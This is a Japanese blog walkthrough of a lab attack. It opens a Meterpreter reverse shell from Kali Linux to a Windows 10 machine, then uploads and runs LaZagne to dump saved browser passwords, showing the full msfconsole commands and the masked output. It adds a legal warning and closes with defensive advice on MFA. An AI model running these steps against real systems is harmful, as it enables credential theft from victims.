- LaZagneとは
- LaZagneのダウンロード
- LaZagne.exeを/root/下に移す
- リバースシェルによるセッションの確立
- LaZagne.exeを標的PCにアップロードする
- パスワード奪取の実行
- 奪取に成功したパスワード一覧の確認
- まとめ
※注意 こちらで紹介した内容を外部サーバーに対して実行した場合、場合によっては刑法にて処罰されます。 実験を行う場合は必ずローカル環境にテスト用のサーバーを構築して実行してください。
LaZagneとは
LaZagneとはWindowsシステム内に保存されているパスワードを抽出するツールです。
リバースシェルにてセッションが確立された状態でこのツールを実行すると、標的PCのブラウザに保存されているパスワードやWiFiのパスワードなどを根こそぎ奪うことが可能になります。権限昇格も不要なので非常に協力なハッキングになります。
LaZagneのダウンロード
下記URLにアクセスして攻撃PCのKali Linux上に、Windows用のLaZagneをダウンロードします。
LaZagne.exeを/root/下に移す
ダウンロードしたLaZagne.exeを/root下に移します。
└─# cp -r /home/kali/Downloads/LaZagne.exe /root/ ┌──(root㉿kali)-[~] └─# cd /root ┌──(root㉿kali)-[~] └─# ll 合計 14316 -rw-r--r-- 1 root root 11849245 8月 13 22:04 LaZagne.exe
リバースシェルによるセッションの確立
この攻撃が成立するには、権限昇格やスクリーンショット奪取のときと同様、ペイロードを作成して、標的PC内で実行させる必要があります。
リバースシェルによるセッション確立の方法か下記記事などを参照
リバースシェルを用いてWindows10をリモートから権限昇格させる方法 - Security Record
標的PC(Windows10)を遠隔操作してリモートからスクリーンショットを入手する方法 - Security Record
┌──(root㉿kali)-[~] └─# msfconsole msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.28.5 LHOST => 192.168.28.5 msf6 exploit(multi/handler) > exploit -j -z [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.28.5:4444 msf6 exploit(multi/handler) > [*] Sending stage (200774 bytes) to 192.168.28.8 [*] Meterpreter session 1 opened (192.168.28.5:4444 -> 192.168.28.8:50522) at 2023-08-13 22:13:38 +0900 msf6 exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1...
標的PCで実行ファイルがクリックされたことによりセッションが確立されました。
LaZagne.exeを標的PCにアップロードする
セッションが確立された事により、攻撃PCのKali Linux上でWindowsを操作することが出来るようになりました。
次はLaZagne.exeを標的PCにアップロードします。
今回はC:\Users\user\Downloads
にアップロードさせました。
実際の攻撃では普段ユーザーが見ないようなフォルダにアップされると思われます。
meterpreter > cd "C:\Users\user\Downloads" meterpreter > pwd C:\Users\user\Downloads meterpreter > upload LaZagne.exe [*] Uploading : /root/LaZagne.exe -> LaZagne.exe [*] Uploaded 8.00 MiB of 11.30 MiB (70.79%): /root/LaZagne.exe -> LaZagne.exe [*] Uploaded 11.30 MiB of 11.30 MiB (100.0%): /root/LaZagne.exe -> LaZagne.exe [*] Completed : /root/LaZagne.exe -> LaZagne.exe meterpreter > pwd C:\Users\user\Downloads meterpreter > shell Process 8884 created. Channel 2 created. Microsoft Windows [Version 10.0.19045.2006] (c) Microsoft Corporation. All rights reserved.
パスワード奪取の実行
アップロードしたフォルダに移動した状態で、LaZagne.exe all
と入力してパスワード奪取を試みます。
C:\Users\user\Downloads>LaZagne.exe all LaZagne.exe all
奪取に成功したパスワード一覧の確認
パスワード奪取に成功したら、ログインURL、ログインID、パスワードがすべてコンソールに平文で表示されます。 恐ろしいです。
|====================================================================| | | | The LaZagne Project | | | | ! BANG BANG ! | | | |====================================================================| ########## User: user########## ------------------- Credman passwords ----------------- ------------------- Chromium edge passwords ----------------- [+] Password found !!! URL: https://adobeid-na1.services.adobe.com/renga-idprovider/pages/login.do Login: ************* Password: ************* [+] Password found !!! URL: https://cart.onamae.com/register/order Login: ************* Password: ************* [+] Password found !!! URL: https://secure.sakura.ad.jp/auth/login Login: ************* Password: *************
奪うことに成功したパスワード一覧のスクショですが、これはほんの一部分です。
まとめ
LaZagneを使用してパスワード奪取を実験した結果、ローカルでChromeに保存されていたパスワード100件近くが全て抜き取られ、コンソールに表示されました。 その中にはネットバンクのID・パスワードも含まれていました。
厄介な事に、奪取される情報にID、パスワードだけでなく、ログインURLも含まれていた事です。 攻撃者は奪ったID、パスワードがどこで使われているものなのか、ひと目で分かるようになっていました。
この攻撃は、リバースシェルにてセッションを確立する事が前提条件となるので、いきなり抜き取られるような事は無いですが、 万一実行ファイルをクリックしてしまったら、攻撃者は特権昇格の必要もなく、全てパスワードを奪い取ることができてしまいます。
このような危険なツールが簡単にダウンロード出来るような状況なので、もはやMFA認証が提供されていないツールはwebサービスは使うべきではないのかもしれません。また、そもそもブラウザにパスワードを保存しておくべきでは無いかもしれません。